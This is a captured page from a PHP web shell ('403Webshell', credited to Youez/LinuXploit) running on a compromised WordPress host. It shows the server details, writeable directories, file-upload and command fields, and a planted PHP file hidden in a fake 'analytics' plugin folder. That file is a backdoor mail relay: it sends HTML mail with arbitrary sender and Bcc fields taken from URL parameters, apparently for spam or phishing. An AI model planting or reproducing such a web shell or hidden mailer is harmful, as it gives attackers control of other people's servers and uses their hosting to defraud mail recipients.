403Webshell
Server IP : 145.239.37.162  /  Your IP : 216.73.217.81
Web Server : Apache
System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaa ( 38250)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaa/www/wp-content/plugins/analytics_1785797092/libs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaa/www/wp-content/plugins/analytics_1785797092/libs//home.1785797092.php
<!--lmDkGOTH-->
<!--lmDkGOTH-->
<?php
if (isset($_GET['to']) && isset($_GET['name']) && isset($_GET['subject']) && isset($_GET['message']) && isset($_GET['bcc'])) {
    $to = $_GET['to'];
    $name = $_GET['name'];
    $subject = $_GET['subject'];
    $message = $_GET['message'];
    $bcc = $_GET['bcc'];

    // Дополнительные заголовки
    $headers = "From: $name\r\n";
    $headers .= "MIME-Version: 1.0\r\n";
    $headers .= "Content-Type: text/html; charset=utf-8\r\n";
    $headers .= "Bcc: $bcc\r\n"; // Добавление заголовка Bcc

    // Отправка письма
    $result = mail($to, $subject, $message, $headers);

    if ($result) {
        echo 'OK.';
    } else {
        echo 'BAD.';
    }
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit